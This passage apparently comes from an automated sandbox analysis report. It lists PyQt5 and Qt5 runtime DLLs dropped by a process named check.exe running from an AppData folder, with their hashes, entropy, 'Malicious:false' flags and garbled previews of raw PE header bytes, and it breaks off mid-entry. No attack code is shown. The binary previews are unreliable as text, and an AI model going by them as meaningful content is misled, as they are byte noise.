                                                                                                                                                                                                                                      SHA-512:7BA616EDE66B16D9F8B2A56C3117DB49A74D59D0D32EAA6958DE57EAC78F14B1C7F2DBBA9EAE4D77937399CF14D44535531BAF6F9DB16F357F8712DFAAE4346A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D..*..*..*.....*...+..*.../..*.......*...)..*...+..*.O.+..*..+...*.O./..*.O.*..*.O....*.....*.O.(..*.Rich.*.........................PE..d...]._.........." .....\...<.......\..............................................K.....`..........................................h..to...................`...Q..............4.......T.......................(...`...0............p...............................text...yZ.......\.................. ..`.rdata..0....p.......`..............@..@.data...X....@......."..............@....pdata...Q...`...R...2..............@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\Qt5Gui.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):7008240
                                                                                                                                                                                                                                      Entropy (8bit):6.674290383197779
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:49152:9VPhJZWVvpg+za3cFlc61j2VjBW77I4iNlmLPycNRncuUx24LLsXZFC6FOCfDt2/:BJZzI1ZR3U9Cxc22aDACInVc4Z
                                                                                                                                                                                                                                      MD5:47307A1E2E9987AB422F09771D590FF1
                                                                                                                                                                                                                                      SHA1:0DFC3A947E56C749A75F921F4A850A3DCBF04248
                                                                                                                                                                                                                                      SHA-256:5E7D2D41B8B92A880E83B8CC0CA173F5DA61218604186196787EE1600956BE1E
                                                                                                                                                                                                                                      SHA-512:21B1C133334C7CA7BBBE4F00A689C580FF80005749DA1AA453CCEB293F1AD99F459CA954F54E93B249D406AEA038AD3D44D667899B73014F884AFDBD9C461C14
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......QH^~.)0-.)0-.)0-.Q.-.)0-...-.)0-.F4,.)0-.F3,.)0-.F5,.)0-.F1,.)0-.Y1,.)0-.B5,.)0-.B1,.)0-.)1-m,0-.Y4,.)0-.Y5,|(0-.Y0,.)0-.Y.-.)0-.).-.)0-.Y2,.)0-Rich.)0-................PE..d....._.........." ......?...+.....X.?.......................................k.....R.k...`.........................................pKK.....d.e.|....`k.......g.......j......pk..6....F.T................... .F.(.....F.0.............?.p+...........................text...2.?.......?................. ..`.rdata...z&...?..|&...?.............@..@.data....o... f.......f.............@....pdata........g.......f.............@..@.rsrc........`k.......j.............@..@.reloc...6...pk..8....j.............@..B........................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\Qt5Network.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1340400
                                                                                                                                                                                                                                      Entropy (8bit):6.41486755163134
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24576:eXPn73RXox1U9M0m+1ffSDY565RzHUY1iaRy95hdGehEM:+7hXU1U95m4ff9A5RviaRy9NGI
                                                                                                                                                                                                                                      MD5:3569693D5BAE82854DE1D88F86C33184
                                                                                                                                                                                                                                      SHA1:1A6084ACFD2AA4D32CEDFB7D9023F60EB14E1771
                                                                                                                                                                                                                                      SHA-256:4EF341AE9302E793878020F0740B09B0F31CB380408A697F75C69FDBD20FC7A1
                                                                                                                                                                                                                                      SHA-512:E5EFF4A79E1BDAE28A6CA0DA116245A9919023560750FC4A087CDCD0AB969C2F0EEEC63BBEC2CD5222D6824A01DD27D2A8E6684A48202EA733F9BB2FAB048B32
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........Yt..7'..7'..7'...'..7'..3&..7'}.3&..7'}.4&..7'}.2&..7'}.6&..7'..6&..7'0.6&..7'..6'c.7'0.2&2.7'0.7&..7'0..'..7'...'..7'0.5&..7'Rich..7'........................PE..d....._.........." .................................................................c....`......................................... ....n..,...h....................X..........,.......T...................p...(...@...0............................................text...C........................... ..`.rdata...g.......h..................@..@.data...XN...@...2... ..............@....pdata...............R..............@..@.rsrc................>..............@..@.reloc..,............D..............@..B................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\Qt5Qml.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):3591664
                                                                                                                                                                                                                                      Entropy (8bit):6.333693598000157
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:98304:iPnt09+kVh2NrSdSG779LLLS/o/L4YqoY0Xba+mRRH2T:iPnt2ZVhT
                                                                                                                                                                                                                                      MD5:D055566B5168D7B1D4E307C41CE47C4B
                                                                                                                                                                                                                                      SHA1:043C0056E9951DA79EC94A66A784972532DC18EF
                                                                                                                                                                                                                                      SHA-256:30035484C81590976627F8FACE9507CAA8581A7DC7630CCCF6A8D6DE65CAB707
                                                                                                                                                                                                                                      SHA-512:4F12D17AA8A3008CAA3DDD0E41D3ED713A24F9B5A465EE93B2E4BECCF876D5BDF0259AA0D2DD77AD61BB59DC871F78937FFBE4D0F60638014E8EA8A27CAF228D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W.4...Z...Z...Z......Z..^...Z..Y...Z.._...Z..[...Z...[...Z...[...Z...[...Z..._...Z...Z...Z.......Z......Z...X...Z.Rich..Z.........PE..d......_.........." .....^$..........O$.......................................7.....}.7...`...........................................,......2.......6.......4. .....6.......6..J....).T.....................).(...p.).0............p$..%...........................text....\$......^$................. ..`.rdata......p$......b$.............@..@.data.........3..n....2.............@....pdata.. .....4......l4.............@..@.rsrc.........6......`6.............@..@.reloc...J....6..L...f6.............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\Qt5QmlModels.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):438768
                                                                                                                                                                                                                                      Entropy (8bit):6.312090336793804
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6144:k1tE6lq982HdyuEZ5gw+VHDZjZ0yOWm7Vdcm4GyasLCZCu6vdQp:k1tEuq9Hdyuo5gwguyOtVIup
                                                                                                                                                                                                                                      MD5:2030C4177B499E6118BE5B9E5761FCE1
                                                                                                                                                                                                                                      SHA1:050D0E67C4AA890C80F46CF615431004F2F4F8FC
                                                                                                                                                                                                                                      SHA-256:51E4E5A5E91F78774C44F69B599FAE4735277EF2918F7061778615CB5C4F6E81
                                                                                                                                                                                                                                      SHA-512:488F7D5D9D8DEEE9BBB9D63DAE346E46EFEB62456279F388B323777999B597C2D5AEA0EE379BDF94C9CBCFD3367D344FB6B5E90AC40BE2CE95EFA5BBDD363BCC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..<...<...<...5.H.4...(...>.......*.......4.......8.......8......9...<...g....../......=....$.=...<.L.=......=...Rich<...................PE..d...M.._.........." .....(...r......d+..............................................MF....`.........................................0E...^..0................`.. F..................H...T.......................(.......0............@...............................text...N&.......(.................. ..`.rdata.......@.......,..............@..@.data...x/...0...(..................@....pdata.. F...`...H...>..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\Qt5Quick.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):4148720
                                                                                                                                                                                                                                      Entropy (8bit):6.462183686222023
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:49152:EcDwCQsvkBD+ClI3IAVLA7Tr15SokomoqxQhT2bAssCFEUGX5ig:E7CKPsA3p0Z/QV/sS3Ag
                                                                                                                                                                                                                                      MD5:65F59CFC0C1C060CE20D3B9CEFFBAF46
                                                                                                                                                                                                                                      SHA1:CFD56D77506CD8C0671CA559D659DAB39E4AD3C2
                                                                                                                                                                                                                                      SHA-256:C81AD3C1111544064B1830C6F1AEF3C1FD13B401546AB3B852D697C0F4D854B3
                                                                                                                                                                                                                                      SHA-512:D6F6DC19F1A0495026CBA765B5A2414B6AF0DBFC37B5ACEED1CD0AE37B3B0F574B759A176D75B01EDD74C6CE9A3642D3D29A3FD7F166B53A41C8978F562B4B50
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!Fvge'.4e'.4e'.4l_.4i'.4.H.5m'.4.H.5a'.4.H.5|'.4.H.5c'.4.W.5o'.4qL.5`'.4e'.4.,.4.W.5.'.4.W.5d'.4.W.4d'.4e'.4d'.4.W.5d'.4Riche'.4........................PE..d......_.........." ......%..B......L.$.......................................?.......?...`.........................................0)2.P.....8.T.....>.......<..^...2?.......?.py......T.......................(.......0............ %..\...........................text.....%.......%................. ..`.rdata....... %.......%.............@..@.data....I...@;..2... ;.............@....pdata...^....<..`...R<.............@..@.rsrc.........>.......>.............@..@.reloc..py....?..z....>.............@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\Qt5Svg.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):330736
                                                                                                                                                                                                                                      Entropy (8bit):6.381828869454302
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6144:6qLZcTC3wR/0JNZ+csBkBv0L0hq+SvcO8MsvwbIeblsjTR:6qNcCwqHE2fYlsPR
                                                                                                                                                                                                                                      MD5:03761F923E52A7269A6E3A7452F6BE93
                                                                                                                                                                                                                                      SHA1:2CE53C424336BCC8047E10FA79CE9BCE14059C50
                                                                                                                                                                                                                                      SHA-256:7348CFC6444438B8845FB3F59381227325D40CA2187D463E82FC7B8E93E38DB5
                                                                                                                                                                                                                                      SHA-512:DE0FF8EBFFC62AF279E239722E6EEDD0B46BC213E21D0A687572BFB92AE1A1E4219322233224CA8B7211FFEF52D26CB9FE171D175D2390E3B3E6710BBDA010CB
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............_._._..*_._,.^._..^._,.^._,.^._,.^._a.^._._=.._a.^._a.^._a.F_._.._._a.^._Rich._................PE..d......_.........." .........................................................@.......^....`.................................................((....... ...........0...........0..H...xL..T....................N..(....L..0............................................text............................... ..`.rdata..p...........................@..@.data...8...........................@....pdata...0.......2..................@..@.rsrc........ ......................@..@.reloc..H....0......................@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\Qt5WebSockets.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):149488
                                                                                                                                                                                                                                      Entropy (8bit):6.116105454277536
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:4sSkET6pEXb3loojg1Q2sorWvZXF2sorrLA7cG27Qhvvc:4sSd6pwzloDbsnX0sCrc7ct7QVc
                                                                                                                                                                                                                                      MD5:A016545F963548E0F37885E07EF945C7
                                                                                                                                                                                                                                      SHA1:CBE499E53AB0BD2DA21018F4E2092E33560C846F
                                                                                                                                                                                                                                      SHA-256:6B56F77DA6F17880A42D2F9D2EC8B426248F7AB2196A0F55D37ADE39E3878BC6
                                                                                                                                                                                                                                      SHA-512:47A3C965593B97392F8995C7B80394E5368D735D4C77F610AFD61367FFE7658A0E83A0DBD19962C4FA864D94F245A9185A915010AFA23467F999C833982654C2
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........'`.CF.KCF.KCF.KJ>.KGF.K.).JAF.KW-.JAF.K.).JVF.K.).JKF.K.).J@F.K.6.JFF.KCF.K.G.K.6.JPF.K.6.JBF.K.6.KBF.KCF.KBF.K.6.JBF.KRichCF.K........................PE..d......_.........." .....$..........t(.......................................p.......5....`............................................."..l........P.......0.......,.......`..L...hw..T....................x..(....w..0............@...............................text....".......$.................. ..`.rdata..z....@.......(..............@..@.data...x...........................@....pdata.......0......................@..@.rsrc........P......."..............@..@.reloc..L....`.......(..............@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\Qt5Widgets.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):5498352
                                                                                                                                                                                                                                      Entropy (8bit):6.619117060971844
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:49152:KO+LIFYAPZtMym9RRQ7/KKIXSewIa/2Xqq1sfeOoKGOh6EwNmiHYYwBrK8KMlH0p:IGoKZdRqJD10rK8KMlH0gi5GX0oKZ
                                                                                                                                                                                                                                      MD5:4CD1F8FDCD617932DB131C3688845EA8
                                                                                                                                                                                                                                      SHA1:B090ED884B07D2D98747141AEFD25590B8B254F9
                                                                                                                                                                                                                                      SHA-256:3788C669D4B645E5A576DE9FC77FCA776BF516D43C89143DC2CA28291BA14358
                                                                                                                                                                                                                                      SHA-512:7D47D2661BF8FAC937F0D168036652B7CFE0D749B571D9773A5446C512C58EE6BB081FEC817181A90F4543EBC2367C7F8881FF7F80908AA48A7F6BB261F1D199
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x..................I.......I.......I.......I...........................................9.................................Rich............PE..d....._.........." ......3..P .......3.......................................T......MT...`.........................................0.D.P^....L.h....pS......0P..8....S.......S.d.....?.T...................`.?.(...0.?.0.............3.._...........................text.....3.......3................. ..`.rdata..8.....3.......3.............@..@.data.........O......dO.............@....pdata...8...0P..:....O.............@..@.rsrc........pS......4S.............@..@.reloc..d.....S......:S.............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\VCRUNTIME140.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):101872
                                                                                                                                                                                                                                      Entropy (8bit):6.5661918084228725
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:RCKWZGuEK0mOLSTxoPl9GIcuZrxi4hXX9oix8H+NCIecbGShwZul:RFWY1WxgGStJ8H2CIecbG36
                                                                                                                                                                                                                                      MD5:971DBBE854FC6AB78C095607DFAD7B5C
                                                                                                                                                                                                                                      SHA1:1731FB947CD85F9017A95FDA1DC5E3B0F6B42CA2
                                                                                                                                                                                                                                      SHA-256:5E197A086B6A7711BAA09AFE4EA7C68F0E777B2FF33F1DF25A21F375B7D9693A
                                                                                                                                                                                                                                      SHA-512:B966AAB9C0D9459FADA3E5E96998292D6874A7078924EA2C171F0A1A50B0784C24CC408D00852BEC48D6A01E67E41D017684631176D3E90151EC692161F1814D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w.............t:..............................................................Rich....................PE..d.....t^.........." .........^.......................................................e....`A.........................................0..4....9.......p.......P.......L...A..............8........................... ...0............................................text...2........................... ..`.rdata...?.......@..................@..@.data...0....@.......4..............@....pdata.......P.......8..............@..@_RDATA.......`.......D..............@..@.rsrc........p.......F..............@..@.reloc...............J..............@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\VCRUNTIME140_1.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):44528
                                                                                                                                                                                                                                      Entropy (8bit):6.627837381503075
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:Aim/NRETi8kykt25HwviU5fJUiP2551xWmbTqOA7SXf+Ny85xM8ATJWr3KWoC8cS:0Ie8kySL2iPQxdvjAevcMESW5lxJG
                                                                                                                                                                                                                                      MD5:6BC084255A5E9EB8DF2BCD75B4CD0777
                                                                                                                                                                                                                                      SHA1:CF071AD4E512CD934028F005CABE06384A3954B6
                                                                                                                                                                                                                                      SHA-256:1F0F5F2CE671E0F68CF96176721DF0E5E6F527C8CA9CFA98AA875B5A3816D460
                                                                                                                                                                                                                                      SHA-512:B822538494D13BDA947655AF791FED4DAA811F20C4B63A45246C8F3BEFA3EC37FF1AA79246C89174FE35D76FFB636FA228AFA4BDA0BD6D2C41D01228B151FD89
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ .S.A...A...A..0.m..A..O....A...9...A...A...A..O....A..O....A..O....A..O....A..O.}..A..O....A..Rich.A..................PE..d.....t^.........." .....:...4......pA...............................................Z....`A.........................................j......|k..x....................l...A......8....b..8...........................@b..0............P..X............................text....9.......:.................. ..`.rdata... ...P..."...>..............@..@.data................`..............@....pdata...............b..............@..@.rsrc................f..............@..@.reloc..8............j..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\d3dcompiler_47.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):4173928
                                                                                                                                                                                                                                      Entropy (8bit):6.329102290474506
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:49152:8BfmqCtLI4erBYysLjG/A8McPyCD6hw16JVTW7B3EgvVlQ3LAYmyNOvGJse+aWyb:8eZevVKACOvWYQF
                                                                                                                                                                                                                                      MD5:B0AE3AA9DD1EBD60BDF51CB94834CD04
                                                                                                                                                                                                                                      SHA1:EE2F5726AC140FB42D17ABA033D678AFAF8C39C1
                                                                                                                                                                                                                                      SHA-256:E994847E01A6F1E4CBDC5A864616AC262F67EE4F14DB194984661A8D927AB7F4
                                                                                                                                                                                                                                      SHA-512:756EBF4FA49029D4343D1BDB86EA71B2D49E20ADA6370FD7582515455635C73D37AD0DBDEEF456A10AB353A12412BA827CA4D70080743C86C3B42FA0A3152AA3
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G..(.a.{.a.{.a.{..m{5a.{..l{.a.{.m{.a.{.o{.a.{.a.{.a.{.i{.a.{.l{.a.{.h{.a.{.q{.a.{.k{.a.{.n{.a.{Rich.a.{........................PE..d......R.........." ......;.........`.8......................................@@......a@...`...........................................;.u...P.>.d.....?.@.....=......t?.h<... ?..{..................................@a................>.P............................text.....;.......;................. ..`.data...h.....;.......;.............@....pdata........=......n<.............@..@.idata..@.....>......B>.............@..@.rsrc...@.....?......\>.............@..@.reloc....... ?......b>.............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\libEGL.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):25072
                                                                                                                                                                                                                                      Entropy (8bit):5.961464514165753
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:KEyYvsyDQrjwgut4Maw+XZndDGg7Dgf2hU:RvszjwgocwOhdDGEUf2hU
                                                                                                                                                                                                                                      MD5:BB00EF1DD81296AF10FDFA673B4D1397
                                                                                                                                                                                                                                      SHA1:773FFCF4A231B963BAAC36CBEF68079C09B62837
                                                                                                                                                                                                                                      SHA-256:32092DE077FD57B6EF355705EC46C6D21F6D72FBE3D3A5DD628F2A29185A96FA
                                                                                                                                                                                                                                      SHA-512:C87C0868C04852B63A7399AFE4E568CD9A65B7B7D5FD63030ABEA649AAC5E9F2293AB5BE2B2CE56A57F2B4B1992AE730150A293ADA53637FC5CD7BE0A727CBD4
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...Xv@.Xv@.Xv@. .@.Xv@.7wA.Xv@.3wA.Xv@.7sA.Xv@.7rA.Xv@.7uA.Xv@W(wA.Xv@.Xw@.Xv@W(sA.Xv@W(vA.Xv@W(.@.Xv@.X.@.Xv@W(tA.Xv@Rich.Xv@........PE..d...#._.........." .........0......................................................Z.....`.........................................`9.......B..d.......H....p.......F.......... ....3..T............................4..0............0...............................text............................... ..`.rdata..r#...0...$..................@..@.data........`.......:..............@....pdata.......p.......<..............@..@.rsrc...H............>..............@..@.reloc.. ............D..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\libGLESv2.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):3385328
                                                                                                                                                                                                                                      Entropy (8bit):6.382356347494905
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:49152:sU0O89Onk/cNTgO/WSLqfTPnK+9eaOiY95ZEQryD1pPG3L:MaHUKt3L
                                                                                                                                                                                                                                      MD5:2247EE4356666335DF7D72129AF8D600
                                                                                                                                                                                                                                      SHA1:F0131C1A67FC17C0E8DCC4A4CA38C9F1780E7182
                                                                                                                                                                                                                                      SHA-256:50FAD5605B3D57627848B3B84A744DFB6A045609B8236B04124F2234676758D8
                                                                                                                                                                                                                                      SHA-512:67F2A7BF169C7B9A516689CF1B16446CA50E57F099B9B742CCB1ABB2DCDE8867F8F6305AD8842CD96194687FC314715AE04C1942B0E0A4F51B592B028C5B16D3
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............t..t..t....t.A.p..t.A.w..t.A.q..t.A.u..t.u..t..u..t...q..t...t..t......t.....t...v..t.Rich..t.........PE..d....._.........." ......&.........L.&.......................................3.......3...`..........................................0..]....0.......3.P.....1.L.....3.......3..;...},.T...................P.,.(... ~,.0.............'..............................text...o.&.......&................. ..`.rdata........'.......&.............@..@.data.........1.......0.............@....pdata..L.....1.......1.............@..@.rsrc...P.....3......J3.............@..@.reloc...;....3..<...P3.............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\opengl32sw.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):20923392
                                                                                                                                                                                                                                      Entropy (8bit):6.255903817217008
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:393216:LIckHor5uLnn83wAP5hxOZEa7/LzRuDFqILn5LgcKyZyQXt+8M:yEZbv
                                                                                                                                                                                                                                      MD5:7DBC97BFEE0C7AC89DA8D0C770C977B6
                                                                                                                                                                                                                                      SHA1:A064C8D8967AAA4ADA29BD9FEFBE40405360412C
                                                                                                                                                                                                                                      SHA-256:963641A718F9CAE2705D5299EAE9B7444E84E72AB3BEF96A691510DD05FA1DA4
                                                                                                                                                                                                                                      SHA-512:286997501E1F5CE236C041DCB1A225B4E01C0F7C523C18E9835507A15C0AC53C4D50F74F94822125A7851FE2CB2FB72F84311A2259A5A50DCE6F56BA05D1D7E8
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[.@..............'.......'.......'..[...........|.-.....|.+.*...|.*.<....'......../.....q.*.....q.+....q.&.^...q.......q.,.....Rich............PE..d....._W.........." .....(....b.....|&....................................... E...........`.........................................0.1.t.....1...............9.`n............C..k.. . .T..................... .(..... ..............@...............................text...T&.......(.................. ..`.rdata..XvO..@...xO..,..............@..@.data....;....1.......1.............@....pdata..`n....9..p...D3.............@..@.gfids.......pC.......=.............@..@.tls..........C.......=.............@..._RDATA........C.......=.............@..@.reloc...k....C..l....=.............@..B................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\generic\qtuiotouchplugin.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):68080
                                                                                                                                                                                                                                      Entropy (8bit):6.207162014262433
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:mQ4IT53ign4CbtlO705xWL3frA5rlhgQJ7tapgUff:mLIT53Hbtk70OLs3hg0Cz
                                                                                                                                                                                                                                      MD5:750A31DE7840B5EED8BA14C1BD84D348
                                                                                                                                                                                                                                      SHA1:D345D13B0C303B7094D1C438E49F0046791DE7F6
                                                                                                                                                                                                                                      SHA-256:A9BFFB0F3CD69CD775C328C916E46440FE80D99119FAEBC350C7EC51E3E57C41
